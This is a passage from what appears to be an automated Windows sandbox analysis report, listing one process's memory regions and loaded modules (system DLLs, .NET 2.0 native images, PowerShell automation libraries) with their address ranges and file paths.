	        filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSOXMLMF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msoxmlmf.dll")

Region:
	              id = 701
	        start_va = 0x7ffc05ea0000
	          end_va = 0x7ffc05eb5fff
	     entry_point = 0x7ffc05ea0000
	     region_type = mapped_file
	            name = "vcruntime140.dll"
	        filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll")

Region:
	              id = 702
	        start_va = 0x7ffc12bc0000
	          end_va = 0x7ffc12cb3fff
	     entry_point = 0x7ffc12bc0000
	     region_type = mapped_file
	            name = "ucrtbase.dll"
	        filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")

Region:
	              id = 703
	        start_va = 0x233e1310000
	          end_va = 0x233e1310fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1310000"
	        filename = ""

Region:
	              id = 704
	        start_va = 0x233e1320000
	          end_va = 0x233e1320fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1320000"
	        filename = ""

Region:
	              id = 705
	        start_va = 0x233e3550000
	          end_va = 0x233e364ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e3550000"
	        filename = ""

Region:
	              id = 706
	        start_va = 0x7ffc06410000
	          end_va = 0x7ffc06423fff
	     entry_point = 0x7ffc06410000
	     region_type = mapped_file
	            name = "wbemsvc.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")

Region:
	              id = 1333
	        start_va = 0x7ffc06430000
	          end_va = 0x7ffc06525fff
	     entry_point = 0x7ffc06430000
	     region_type = mapped_file
	            name = "fastprox.dll"
	        filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")

Region:
	              id = 1334
	        start_va = 0x233e1330000
	          end_va = 0x233e134ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1330000"
	        filename = ""

Region:
	              id = 1335
	        start_va = 0x233e1330000
	          end_va = 0x233e134ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1330000"
	        filename = ""

Region:
	              id = 1336
	        start_va = 0x233e3710000
	          end_va = 0x233e380ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e3710000"
	        filename = ""

Region:
	              id = 1337
	        start_va = 0x7ffc063e0000
	          end_va = 0x7ffc06404fff
	     entry_point = 0x7ffc063e0000
	     region_type = mapped_file
	            name = "wmiutils.dll"
	        filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")

Region:
	              id = 1338
	        start_va = 0x7ffbf7780000
	          end_va = 0x7ffbf779bfff
	     entry_point = 0x7ffbf7780000
	     region_type = mapped_file
	            name = "wmi2xml.dll"
	        filename = "\\Windows\\System32\\wbem\\xml\\wmi2xml.dll" (normalized: "c:\\windows\\system32\\wbem\\xml\\wmi2xml.dll")

Region:
	              id = 1339
	        start_va = 0x233e3810000
	          end_va = 0x233e390ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e3810000"
	        filename = ""

Region:
	              id = 1340
	        start_va = 0x7ffc14a70000
	          end_va = 0x7ffc15fcefff
	     entry_point = 0x7ffc14a70000
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 1341
	        start_va = 0x233e1330000
	          end_va = 0x233e1330fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1330000"
	        filename = ""

Region:
	              id = 1342
	        start_va = 0x233e1340000
	          end_va = 0x233e1340fff
	     entry_point = 0x233e1340000
	     region_type = mapped_file
	            name = "counters.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat")

Region:
	              id = 1343
	        start_va = 0x7ffc0b3b0000
	          end_va = 0x7ffc0b3c4fff
	     entry_point = 0x7ffc0b3b0000
	     region_type = mapped_file
	            name = "ondemandconnroutehelper.dll"
	        filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll")

Region:
	              id = 1344
	        start_va = 0x7ffc0f200000
	          end_va = 0x7ffc0f2c7fff
	     entry_point = 0x7ffc0f200000
	     region_type = mapped_file
	            name = "winhttp.dll"
	        filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")

Region:
	              id = 1345
	        start_va = 0x233e1350000
	          end_va = 0x233e1350fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1350000"
	        filename = ""

Region:
	              id = 1346
	        start_va = 0x7ffc16fa0000
	          end_va = 0x7ffc16fa7fff
	     entry_point = 0x7ffc16fa0000
	     region_type = mapped_file
	            name = "nsi.dll"
	        filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")

Region:
	              id = 1347
	        start_va = 0x7ffc12490000
	          end_va = 0x7ffc12539fff
	     entry_point = 0x7ffc12490000
	     region_type = mapped_file
	            name = "dnsapi.dll"
	        filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")

Region:
	              id = 1348
	        start_va = 0x7ffc132f0000
	          end_va = 0x7ffc1334bfff
	     entry_point = 0x7ffc132f0000
	     region_type = mapped_file
	            name = "mswsock.dll"
	        filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")

Region:
	              id = 1349
	        start_va = 0x7ffc0c430000
	          end_va = 0x7ffc0c43afff
	     entry_point = 0x7ffc0c430000
	     region_type = mapped_file
	            name = "winnsi.dll"
	        filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")

Region:
	              id = 1350
	        start_va = 0x233e1360000
	          end_va = 0x233e136ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1360000"
	        filename = ""

Region:
	              id = 1351
	        start_va = 0x233e3910000
	          end_va = 0x233e3a0ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e3910000"
	        filename = ""

Region:
	              id = 1352
	        start_va = 0x7ffc0ad10000
	          end_va = 0x7ffc0ad19fff
	     entry_point = 0x7ffc0ad10000
	     region_type = mapped_file
	            name = "rasadhlp.dll"
	        filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")

Region:
	              id = 1353
	        start_va = 0x7ffc0c360000
	          end_va = 0x7ffc0c3c6fff
	     entry_point = 0x7ffc0c360000
	     region_type = mapped_file
	            name = "fwpuclnt.dll"
	        filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")

Region:
	              id = 1354
	        start_va = 0x233e3a10000
	          end_va = 0x233e3e0afff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e3a10000"
	        filename = ""

Region:
	              id = 1355
	        start_va = 0x7ffc12f70000
	          end_va = 0x7ffc12fe9fff
	     entry_point = 0x7ffc12f70000
	     region_type = mapped_file
	            name = "schannel.dll"
	        filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll")

Region:
	              id = 1356
	        start_va = 0x7ffc13a90000
	          end_va = 0x7ffc13a9ffff
	     entry_point = 0x7ffc13a90000
	     region_type = mapped_file
	            name = "msasn1.dll"
	        filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")

Region:
	              id = 1357
	        start_va = 0x7ffc142c0000
	          end_va = 0x7ffc14486fff
	     entry_point = 0x7ffc142c0000
	     region_type = mapped_file
	            name = "crypt32.dll"
	        filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")

Region:
	              id = 1358
	        start_va = 0x233e1370000
	          end_va = 0x233e1371fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1370000"
	        filename = ""

Region:
	              id = 1359
	        start_va = 0x7ffc03cc0000
	          end_va = 0x7ffc03cd3fff
	     entry_point = 0x7ffc03cc0000
	     region_type = mapped_file
	            name = "mskeyprotect.dll"
	        filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll")

Region:
	              id = 1360
	        start_va = 0x7ffc13550000
	          end_va = 0x7ffc13589fff
	     entry_point = 0x7ffc13550000
	     region_type = mapped_file
	            name = "ntasn1.dll"
	        filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll")

Region:
	              id = 1361
	        start_va = 0x7ffc13590000
	          end_va = 0x7ffc135b6fff
	     entry_point = 0x7ffc13590000
	     region_type = mapped_file
	            name = "ncrypt.dll"
	        filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll")

Region:
	              id = 1362
	        start_va = 0x7ffc13070000
	          end_va = 0x7ffc13079fff
	     entry_point = 0x7ffc13070000
	     region_type = mapped_file
	            name = "dpapi.dll"
	        filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll")

Region:
	              id = 1363
	        start_va = 0x7ffc13bf0000
	          end_va = 0x7ffc13c44fff
	     entry_point = 0x7ffc13bf0000
	     region_type = mapped_file
	            name = "wintrust.dll"
	        filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")

Region:
	              id = 1364
	        start_va = 0x7ffc133a0000
	          end_va = 0x7ffc133b6fff
	     entry_point = 0x7ffc133a0000
	     region_type = mapped_file
	            name = "cryptsp.dll"
	        filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")

Region:
	              id = 1365
	        start_va = 0x7ffc13030000
	          end_va = 0x7ffc13063fff
	     entry_point = 0x7ffc13030000
	     region_type = mapped_file
	            name = "rsaenh.dll"
	        filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")

Region:
	              id = 1376
	        start_va = 0x3500500000
	          end_va = 0x350057ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000003500500000"
	        filename = ""

Region:
	              id = 1377
	        start_va = 0x7ffc03d40000
	          end_va = 0x7ffc03d5dfff
	     entry_point = 0x7ffc03d40000
	     region_type = mapped_file
	            name = "ncryptsslp.dll"
	        filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll")

Region:
	              id = 1378
	        start_va = 0x7ffc134c0000
	          end_va = 0x7ffc134cafff
	     entry_point = 0x7ffc134c0000
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")

Region:
	              id = 1379
	        start_va = 0x233e1390000
	          end_va = 0x233e13a0fff
	     entry_point = 0x233e1390000
	     region_type = mapped_file
	            name = "c_20127.nls"
	        filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls")

Region:
	              id = 1380
	        start_va = 0x7ffc17330000
	          end_va = 0x7ffc1739efff
	     entry_point = 0x7ffc17330000
	     region_type = mapped_file
	            name = "coml2.dll"
	        filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll")

Region:
	              id = 1381
	        start_va = 0x7ffbf6140000
	          end_va = 0x7ffbf6207fff
	     entry_point = 0x7ffbf6140000
	     region_type = mapped_file
	            name = "jscript.dll"
	        filename = "\\Windows\\System32\\jscript.dll" (normalized: "c:\\windows\\system32\\jscript.dll")

Region:
	              id = 1382
	        start_va = 0x7ffbf68c0000
	          end_va = 0x7ffbf68cffff
	     entry_point = 0x7ffbf68c0000
	     region_type = mapped_file
	            name = "amsi.dll"
	        filename = "\\Windows\\System32\\amsi.dll" (normalized: "c:\\windows\\system32\\amsi.dll")

Region:
	              id = 1383
	        start_va = 0x7ffbf8ae0000
	          end_va = 0x7ffbf8b47fff
	     entry_point = 0x7ffbf8ae0000
	     region_type = mapped_file
	            name = "mscoree.dll"
	        filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll")

Region:
	              id = 1384
	        start_va = 0x233e1370000
	          end_va = 0x233e1376fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1370000"
	        filename = ""

Region:
	              id = 1385
	        start_va = 0x233e3f40000
	          end_va = 0x233e3f4ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e3f40000"
	        filename = ""

Region:
	              id = 1386
	        start_va = 0x7ffbf8a40000
	          end_va = 0x7ffbf8ad7fff
	     entry_point = 0x7ffbf8a40000
	     region_type = mapped_file
	            name = "mscoreei.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll")

Region:
	              id = 1387
	        start_va = 0x7ffc08000000
	          end_va = 0x7ffc08009fff
	     entry_point = 0x7ffc08000000
	     region_type = mapped_file
	            name = "version.dll"
	        filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")

Region:
	              id = 1388
	        start_va = 0x5cfe0000
	          end_va = 0x5d0a8fff
	     entry_point = 0x5cfe0000
	     region_type = mapped_file
	            name = "msvcr80.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9193_none_88e4514b2faac6c7\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9193_none_88e4514b2faac6c7\\msvcr80.dll")

Region:
	              id = 1389
	        start_va = 0x233e13b0000
	          end_va = 0x233e13b0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e13b0000"
	        filename = ""

Region:
	              id = 1390
	        start_va = 0x233e13c0000
	          end_va = 0x233e13cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e13c0000"
	        filename = ""

Region:
	              id = 1391
	        start_va = 0x7ffbf57a0000
	          end_va = 0x7ffbf613ffff
	     entry_point = 0x7ffbf57a0000
	     region_type = mapped_file
	            name = "mscorwks.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll")

Region:
	              id = 1392
	        start_va = 0x233e13d0000
	          end_va = 0x233e13dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e13d0000"
	        filename = ""

Region:
	              id = 1393
	        start_va = 0x233e13e0000
	          end_va = 0x233e13e6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e13e0000"
	        filename = ""

Region:
	              id = 1394
	        start_va = 0x20000
	          end_va = 0x3ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 1395
	        start_va = 0x233e13f0000
	          end_va = 0x233e13f2fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e13f0000"
	        filename = ""

Region:
	              id = 1396
	        start_va = 0x233e1400000
	          end_va = 0x233e1400fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1400000"
	        filename = ""

Region:
	              id = 1397
	        start_va = 0x3500580000
	          end_va = 0x35005fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000003500580000"
	        filename = ""

Region:
	              id = 1398
	        start_va = 0x7ffb96030000
	          end_va = 0x7ffb9603ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96030000"
	        filename = ""

Region:
	              id = 1399
	        start_va = 0x7ffb96040000
	          end_va = 0x7ffb9604ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96040000"
	        filename = ""

Region:
	              id = 1400
	        start_va = 0x7ffb96050000
	          end_va = 0x7ffb960effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96050000"
	        filename = ""

Region:
	              id = 1401
	        start_va = 0x7ffb960f0000
	          end_va = 0x7ffb960fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb960f0000"
	        filename = ""

Region:
	              id = 1402
	        start_va = 0x7ffb96100000
	          end_va = 0x7ffb9616ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96100000"
	        filename = ""

Region:
	              id = 1403
	        start_va = 0x3500600000
	          end_va = 0x350067ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000003500600000"
	        filename = ""

Region:
	              id = 1404
	        start_va = 0x233e3e10000
	          end_va = 0x233e3f1afff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e3e10000"
	        filename = ""

Region:
	              id = 1405
	        start_va = 0x233e3f50000
	          end_va = 0x233fbf4ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e3f50000"
	        filename = ""

Region:
	              id = 1406
	        start_va = 0x233fbf50000
	          end_va = 0x233fc61ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233fbf50000"
	        filename = ""

Region:
	              id = 1407
	        start_va = 0x7ffbf48c0000
	          end_va = 0x7ffbf579dfff
	     entry_point = 0x7ffbf48c0000
	     region_type = mapped_file
	            name = "mscorlib.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\00976757a0c560c95932437bdc9d474f\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\00976757a0c560c95932437bdc9d474f\\mscorlib.ni.dll")

Region:
	              id = 1408
	        start_va = 0x233e1410000
	          end_va = 0x233e141ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1410000"
	        filename = ""

Region:
	              id = 1409
	        start_va = 0x7ff66dda0000
	          end_va = 0x7ff66ddaffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff66dda0000"
	        filename = ""

Region:
	              id = 1410
	        start_va = 0x7ff66ddb0000
	          end_va = 0x7ff66de3ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff66ddb0000"
	        filename = ""

Region:
	              id = 1411
	        start_va = 0x7ffc138b0000
	          end_va = 0x7ffc13948fff
	     entry_point = 0x7ffc138b0000
	     region_type = mapped_file
	            name = "sxs.dll"
	        filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")

Region:
	              id = 1412
	        start_va = 0x233e1420000
	          end_va = 0x233e142ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1420000"
	        filename = ""

Region:
	              id = 1413
	        start_va = 0x7ffb96170000
	          end_va = 0x7ffb9617ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96170000"
	        filename = ""

Region:
	              id = 1414
	        start_va = 0x7ffbf37e0000
	          end_va = 0x7ffbf3e88fff
	     entry_point = 0x7ffbf37e0000
	     region_type = mapped_file
	            name = "system.xml.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\b9686994a3c564bc9709f37a974d0ab1\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\b9686994a3c564bc9709f37a974d0ab1\\system.xml.ni.dll")

Region:
	              id = 1415
	        start_va = 0x7ffbf3e90000
	          end_va = 0x7ffbf48bffff
	     entry_point = 0x7ffbf3e90000
	     region_type = mapped_file
	            name = "system.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\21161602d61e696b127fa8412fba51a5\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\21161602d61e696b127fa8412fba51a5\\system.ni.dll")

Region:
	              id = 1416
	        start_va = 0x233e1430000
	          end_va = 0x233e1437fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1430000"
	        filename = ""

Region:
	              id = 1417
	        start_va = 0x233e1450000
	          end_va = 0x233e1450fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1450000"
	        filename = ""

Region:
	              id = 1418
	        start_va = 0x7ffb96180000
	          end_va = 0x7ffb9618ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96180000"
	        filename = ""

Region:
	              id = 1419
	        start_va = 0x7ffbf3650000
	          end_va = 0x7ffbf37d2fff
	     entry_point = 0x7ffbf3650000
	     region_type = mapped_file
	            name = "mscorjit.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorjit.dll")

Region:
	              id = 1420
	        start_va = 0x233e1460000
	          end_va = 0x233e146ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1460000"
	        filename = ""

Region:
	              id = 1421
	        start_va = 0x233e1470000
	          end_va = 0x233e147ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1470000"
	        filename = ""

Region:
	              id = 1422
	        start_va = 0x233e1480000
	          end_va = 0x233e148ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1480000"
	        filename = ""

Region:
	              id = 1423
	        start_va = 0x233e1490000
	          end_va = 0x233e149ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1490000"
	        filename = ""

Region:
	              id = 1424
	        start_va = 0x7ffb96190000
	          end_va = 0x7ffb961cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96190000"
	        filename = ""

Region:
	              id = 1425
	        start_va = 0x233e14a0000
	          end_va = 0x233e14affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e14a0000"
	        filename = ""

Region:
	              id = 1426
	        start_va = 0x233e14b0000
	          end_va = 0x233e14bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e14b0000"
	        filename = ""

Region:
	              id = 1427
	        start_va = 0x233e14c0000
	          end_va = 0x233e14cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e14c0000"
	        filename = ""

Region:
	              id = 1428
	        start_va = 0x233e14e0000
	          end_va = 0x233e14effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e14e0000"
	        filename = ""

Region:
	              id = 1429
	        start_va = 0x7ffbf2af0000
	          end_va = 0x7ffbf364cfff
	     entry_point = 0x7ffbf2af0000
	     region_type = mapped_file
	            name = "system.management.automation.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management.A#\\f39bedd1fb8c063e389d9599e994a7bb\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management.a#\\f39bedd1fb8c063e389d9599e994a7bb\\system.management.automation.ni.dll")

Region:
	              id = 1430
	        start_va = 0x233e1920000
	          end_va = 0x233e1924fff
	     entry_point = 0x233e1920000
	     region_type = mapped_file
	            name = "sorttbls.nlp"
	        filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp")

Region:
	              id = 1431
	        start_va = 0x233e1930000
	          end_va = 0x233e1932fff
	     entry_point = 0x233e1930000
	     region_type = mapped_file
	            name = "l_intl.nls"
	        filename = "\\Windows\\System32\\l_intl.nls" (normalized: "c:\\windows\\system32\\l_intl.nls")

Region:
	              id = 1432
	        start_va = 0x233e1940000
	          end_va = 0x233e1940fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1940000"
	        filename = ""

Region:
	              id = 1433
	        start_va = 0x233e3650000
	          end_va = 0x233e3690fff
	     entry_point = 0x233e3650000
	     region_type = mapped_file
	            name = "sortkey.nlp"
	        filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp")

Region:
	              id = 1434
	        start_va = 0x7ffbf2ae0000
	          end_va = 0x7ffbf2ae9fff
	     entry_point = 0x7ffbf2ae0000
	     region_type = mapped_file
	            name = "culture.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll")

Region:
	              id = 1435
	        start_va = 0x233e36a0000
	          end_va = 0x233e36f3fff
	     entry_point = 0x233e36a0000
	     region_type = mapped_file
	            name = "mscorrc.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorrc.dll")

Region:
	              id = 1436
	        start_va = 0x7ffbf2980000
	          end_va = 0x7ffbf2aebfff
	     entry_point = 0x7ffbf2980000
	     region_type = mapped_file
	            name = "system.management.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management\\0a275683c96e1bb1b30d0be9e7176315\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management\\0a275683c96e1bb1b30d0be9e7176315\\system.management.ni.dll")

Region:
	              id = 1437
	        start_va = 0x5ccd0000
	          end_va = 0x5cfdbfff
	     entry_point = 0x5ccd0000
	     region_type = mapped_file
	            name = "system.data.dll"
	        filename = "\\Windows\\assembly\\GAC_64\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll")

Region:
	              id = 1438
	        start_va = 0x233e1940000
	          end_va = 0x233e1940fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1940000"
	        filename = ""

Region:
	              id = 1439
	        start_va = 0x7ffb961d0000
	          end_va = 0x7ffb961dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb961d0000"
	        filename = ""

Region:
	              id = 1440
	        start_va = 0x7ffb961e0000
	          end_va = 0x7ffb961effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb961e0000"
	        filename = ""

Region:
	              id = 1441
	        start_va = 0x7ffb961f0000
	          end_va = 0x7ffb961fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb961f0000"
	        filename = ""

Region:
	              id = 1442
	        start_va = 0x7ffb96200000
	          end_va = 0x7ffb9620ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96200000"
	        filename = ""

Region:
	              id = 1443
	        start_va = 0x7ffb96210000
	          end_va = 0x7ffb9621ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96210000"
	        filename = ""

Region:
	              id = 1444
	        start_va = 0x7ffb96220000
	          end_va = 0x7ffb9622ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96220000"
	        filename = ""

Region:
	              id = 1445
	        start_va = 0x7ffb96230000
	          end_va = 0x7ffb9623ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96230000"
	        filename = ""

Region:
	              id = 1446
	        start_va = 0x7ffb96240000
	          end_va = 0x7ffb9624ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96240000"
	        filename = ""

Region:
	              id = 1447
	        start_va = 0x7ffb96250000
	          end_va = 0x7ffb9625ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96250000"
	        filename = ""

Region:
	              id = 1448
	        start_va = 0x7ffb96260000
	          end_va = 0x7ffb9626ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96260000"
	        filename = ""

Region:
	              id = 1449
	        start_va = 0x7ffbf1bd0000
	          end_va = 0x7ffbf2428fff
	     entry_point = 0x7ffbf1bd0000
	     region_type = mapped_file
	            name = "system.data.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Data\\6d7e9346540b54a87f6dc9d2c1e41fde\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.data\\6d7e9346540b54a87f6dc9d2c1e41fde\\system.data.ni.dll")

Region:
	              id = 1450
	        start_va = 0x7ffbf27e0000
	          end_va = 0x7ffbf2973fff
	     entry_point = 0x7ffbf27e0000
	     region_type = mapped_file
	            name = "system.directoryservices.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.DirectorySer#\\c9e715b348d50a8d998941274163be87\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.directoryser#\\c9e715b348d50a8d998941274163be87\\system.directoryservices.ni.dll")

Region:
	              id = 1451
	        start_va = 0x7ffb96270000
	          end_va = 0x7ffb9627ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96270000"
	        filename = ""

Region:
	              id = 1452
	        start_va = 0x7ffb96280000
